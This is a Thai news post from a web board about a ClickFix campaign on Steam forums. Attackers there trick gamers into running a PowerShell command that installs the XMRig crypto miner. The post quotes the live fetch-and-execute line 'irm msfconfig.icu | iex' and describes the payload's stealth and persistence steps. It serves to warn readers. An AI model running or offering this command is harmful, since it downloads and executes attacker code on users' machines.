หน้าแรก ตรวจหวย เว็บบอร์ด ควิซ Pic Post แชร์ลิ้ง หาเพื่อน Chat หาเพื่อน Line Page อัลบั้ม คำคม Glitter เกมถอดรหัสภาพ คำนวณ การเงิน ราคาทองคำ กินอะไรดี
ข้อตกลงการใช้บริการนโยบายความเป็นส่วนตัวนโยบายเนื้อหานโยบายการสร้างรายได้About Usติดต่อเว็บไซต์แจ้งเนื้อหาไม่เหมาะสม
News บอร์ดต่างๆค้นหาตั้งกระทู้

พบแคมเปญ ClickFix บนเว็บบอร์ด Steam Forum เผลอทำตามติดมัลแวร์ได้ทันที

เขียนโดย Annonymus TN

พบแคมเปญ ClickFix บนเว็บบอร์ด Steam Forum เผลอทำตามติดมัลแวร์ได้ทันที

 

รายงานจากเว็บไซต์อย่างเป็นทางการของบริษัทผู้พัฒนาซอฟต์แวร์แอนตี้ไวรัสชื่อดัง Kaspersky ได้กล่าวถึงการตรวจพบแคมเปญปล่อยมัลแวร์ในรูปแบบ ClickFix บนเว็บบอร์ด Steam Forum บนแพลตฟอร์ม Steam ซึ่งเป็นเว็บบอร์ดที่เหล่าเกมเมอร์มักจะใช้งานเพื่อสอบถามชุมชนคนเล่นเกม (Gaming Community) เวลาประสบปัญหาต่าง ๆ เช่น เกมค้าง, เล่นไม่ผ่าน, หรือ หาเทคนิคการเล่นอื่น ๆ โดยแฮกเกอร์จะทำการเนียนเข้าไปตอบตามกระทู้ที่เหยื่อเป้าหมายกำลังประสบปัญหาทางเทคนิค เช่น เกมค้างเล่นไม่ได้ หรือ ของในช่องเก็บของภายในเกมหาย เป็นต้น ซึ่งคอมเมนต์นั้นจะแนะนำให้เหยื่อทำการกด เปิดฟีเจอร์ Run ด้วยการกดปุ่มโลโก้ Windows + R ขึ้นมา เพื่อใช้ในการเปิด PowerShell แล้วคัดลอกโค้ดที่ถูกวางไว้ภายในคอมเมนต์ไปวางแล้วกดรัน หลังจากนั้นก็ให้เหยื่อทำการรีสตาร์ทเครื่อง โดยอ้างว่าเป็นวิธีการที่ช่วยให้เหยื่อแก้ปัญหาที่เกิดขึ้น แต่แท้จริงแล้วเป็นการดาวน์โหลดมัลแวร์ลงมาติดตั้งบนเครื่อง

 

โดยมัลแวร์ที่เป็นกรณีในแคมเปญครั้งนี้นั้นเป็นมัลแวร์ประเภทอาศัยทรัพยากรบนเครื่องของเหยื่อเพื่อขุดเหรียญคริปโตเคอร์เรนซี (Crypto Miner) ที่มีชื่อว่า XMRig ซึ่งใช้ในการขุดเหรียญคริปโตเคอร์เรนซีสกุล Monero มัลแวร์ตัวนี้นั้นเนื้อแท้นั้นแท้จริงแล้วไม่ใช่มัลแวร์ แต่เป็นซอฟต์แวร์สำหรับขุดเหรียญจริง ๆ ที่ถูกพัฒนาแบบเปิด (Open Source) แต่ถูกจัดเป็นมัลแวร์เนื่องจากแฮกเกอร์มักจะนำเอาไปติดตั้งบนเครื่องของเหยื่อ โดยที่ไม่ได้รับการอนุญาตจากเหยื่อเสียก่อน และเนื่องด้วยการที่เครื่องมือชนิดนี้ต้องอาศัยพลังงานประมวลผลที่สูงมาก ดังนั้นเครื่องของเหล่าเกมเมอร์ที่มักจะมีการใช้งานชิปประมวลผลกลาง (CPU) และ ชิปประมวลผลกราฟิก (GPU) ในระดับสูงจึงตกเป็นเหยื่อชั้นดีของแฮกเกอร์สำหรับแคมเปญที่มีการใช้งานมัลแวร์ในประเภทดังกล่าว

 

ทางทีมแหล่งข่าวยังได้อธิบายสิ่งที่น่าสนใจเกี่ยวกับแคมเปญนี้ นั่นคือ สคริปท์ PowerShell ที่แฮกเกอร์หลอกให้เหยื่อรัน ซึ่งมีลักษณะที่ดูเรียบง่าย แต่แฝงอันตรายไว้อยู่ ซึ่งตัวสคริปท์นั้นมีลักษณะดังนี้

 

irm msfconfig.icu | iex

 

โดยแต่ละส่วนของสคริปท์นั้น จะเป็นการสั่งการทำงานที่แตกต่างกันออกไป นั่นคือ

 

Irm หมายถึง Invoke-RestMethod ซึ่งเป็นการสั่งให้ติดต่อกับเว็บไซต์ที่อยู่ภายในสคริปท์เพื่อดึงข้อมูลกลับมา (Response)

Msfconfig.icu หมายถึงเว็บไซต์ปลายทางซึ่งเป็นชื่อเซิร์ฟเวอร์ของแฮกเกอร์ที่ตัวสคริปท์จะทำการติดต่อไป

Iex หมายถึง Invoke-Expression ซึ่งเป็นขั้นตอนในการนำเอาข้อมูลที่ได้รับมาจาก Irm มารันขึ้นบน PowerShell

 

ซึ่งสคริปท์ที่ดาวน์โหลดมานั้นจะเป็นสคริปท์ PowerShell ที่อ้างตัวว่าเป็นซอฟต์แวร์สำหรับการปรับแต่งเพิ่มประสิทธิภาพของเครื่อง โดยสคริปท์นั้นจะมีการกำหนดให้แจ้งเตือนเหยื่อว่า สคริปท์กำลังปฏิบัติการเพื่อให้เครื่องสามารถทำงานได้อย่างมีประสิทธิภาพสูงสุด เช่น ลบไฟล์ขยะ, อัปเดตไดร์เวอร์ใหม่, ตรวจหาข้อผิดพลาดบนฮาร์ดไดร์ฟ เป็นต้น แต่แท้จริงแล้วเบื้องหลังนั้นตัวสคริปท์กำลังตรวจสอบว่ากำลังทำงานด้วยสิทธิ์ของผู้ดูแลระบบ (Administrator) หรือไม่ ซึ่งถ้าตรวจสอบแล้วพบว่าใช่ ก็จะทำการสร้างโฟลเดอร์แบบซ่อนเร้น (Hidden Folder) ไว้ภายใน C:WindowsBackground แล้วจัดการเพิ่มรายชื่อยกเว้น (Exclusion List) ไว้บนเครื่องมือป้องกันภัยไซเบอร์อย่าง Mincrosoft Defender เพื่อป้องกันการถูกตรวจจับ แล้วจึงจัดการสั่งการดาวน์โหลดมัลแวร์ที่ระบุไว้ข้างต้นลงมาไว้ยังโฟลเดอร์ที่อยู่ภายใน C:WindowsBackground แล้วตั้งชื่อให้ดูเหมือนว่าเป็นไฟล์สำหรับระบบที่สำคัญอย่าง system.exe หลังจากที่มัลแวร์ข้างต้นถูกฝังลงระบบได้สำเร็จ ตัวสคริปท์ก็จะทำการตั้งเวลาทำงาน (Task Scheduling) ภายใต้ชื่อว่า XMRig-{computer name} เพื่อให้มั่นใจได้ว่าตัวมัลแวร์จะถูกเปิดขึ้นมาใหม่เสมอแม้จะมีการรีบูท (Reboot) เครื่องก็ตาม

เนื้อหาโดย: Annonymus TN
⚠ แจ้งเนื้อหาไม่เหมาะสม 
Annonymus TN's profile
มีผู้เข้าชมแล้ว 1 ครั้ง
เขียนโดย Annonymus TN
นักข่าวสายอาชญากรรมไซเบอร์และเทคโนโลยี เชี่ยวชาญการรายงานภัยออนไลน์ เช่น มัลแวร์ การหลอกลวง และการใช้ AI ในทางผิด โดยนำเสนอข้อมูลที่ซับซ้อนให้เข้าใจง่าย กระชับ และตรงประเด็น เพื่อให้ผู้อ่านรู้ทันภัยดิจิทัลก่อนตกเป็นเ
เป็นกำลังใจให้เจ้าของกระทู้โดยการ VOTE และ SHARE
Hot Topic ที่น่าสนใจอื่นๆ
ความลับใต้สายน้ำ: ทำไม “สมบัติทองคำ” ใต้แม่น้ำเจ้าพระยาจึงไม่มีใครแตะต้องได้เปิด 5 ห้างที่เงินสะพัดมากที่สุดในไทย อันดับ 1 คนเดินวันละหลักแสนประเทศที่บินเข้าประเทศไทยมากที่สุด อันดับที่ 1 ของโลกเปิดตัวเลขปี 2568 กรมไหนเก็บภาษีได้มากที่สุด เทียบ 3 กรมหลัก กรมสรรพากร สรรพสามิต และศุลกากรเห็นทุกครั้งแต่แทบไม่เคยสนใจ หลักกิโลเมตรข้างถนนมีไว้ทำอะไรโรงเรียนมัธยมที่มีการแข่งขันกันสูงและสอบเข้ายากมากที่สุดในประเทศไทยเปิดสถิติหวยย้อนหลัง 20 ปี งวด 16 กันยายน 69แม่ฮ่องสอนคือจังหวัดที่เกิดคดีน้อยที่สุดส่องสถิติ & ความน่าจะเป็น “เลขท้าย 2 ตัวล่าง” งวด 16 กันยายน 2569... งวดนี้ตัวไหนมีแววมาวิน?รวมให้แล้ว! 10 อาจารย์ดังหวยลาววันนี้ 9 ก.ย. 69 ส่องเลขชนสำนักใหญ่ ตรงกันแบบไม่ได้นัดหมาย!7 โรงหนังที่หรูหราที่สุดในไทย ตั๋วหลักพัน บริการระดับ 5 ดาวเปิด 5 ประเทศที่คนไทยนิยมไปเรียน ต่อมากที่สุด อันดับ 1 มีนักเรียนไทย นับหมื่นคน!
Hot Topic ที่มีผู้ตอบล่าสุด
ประเทศที่บินเข้าประเทศไทยมากที่สุด อันดับที่ 1 ของโลกรีวิวหนังดัง NO TIME TO DIE 007 พยัคฆ์ร้ายฝ่าเวลามรณะ5 มหาวิทยาลัยที่ค่าเรียนแพทย์แพงที่สุดในไทย อันดับ 1 หลายล้านบาทแม่ฮ่องสอนคือจังหวัดที่เกิดคดีน้อยที่สุดได้ยินเสียงแปลกและหินร่วงหลังฝนตก อย่าคิดว่าเป็นเรื่องเล็กของคนบนเขาข้าว 1 ตันเดินทางอย่างไรจากชาวนาถึงจานอาหาร? เปิดเส้นทางราคา การสีข้าว ผลพลอยได้ และต้นทุนตลอดห่วงโซ่
กระทู้อื่นๆในบอร์ด ข่าววันนี้
สวนสนุกญี่ปุ่น เปิดตัวกิจกรรมฮาโลวีน พร้อมอวดบ้านผีสิงสุดสยอง ที่ให้แต่ผู้ใหญ่เล่นเท่านั้น!!ดาราดัง "ยุนจงฮุน" ประกาศแต่งงานกับดาราดัง "ฮันอึนซอ" แล้วดาราดัง "แพค จิน ฮี" เตรียมเข้าพิธีวิวาห์กับแฟนหนุ่มนอกวงการพ่อไปล้างแค้นให้ลูกสาว แต่กลับถูกกลุ่มดังกล่าวรุมทำร้าย
ตั้งกระทู้ใหม่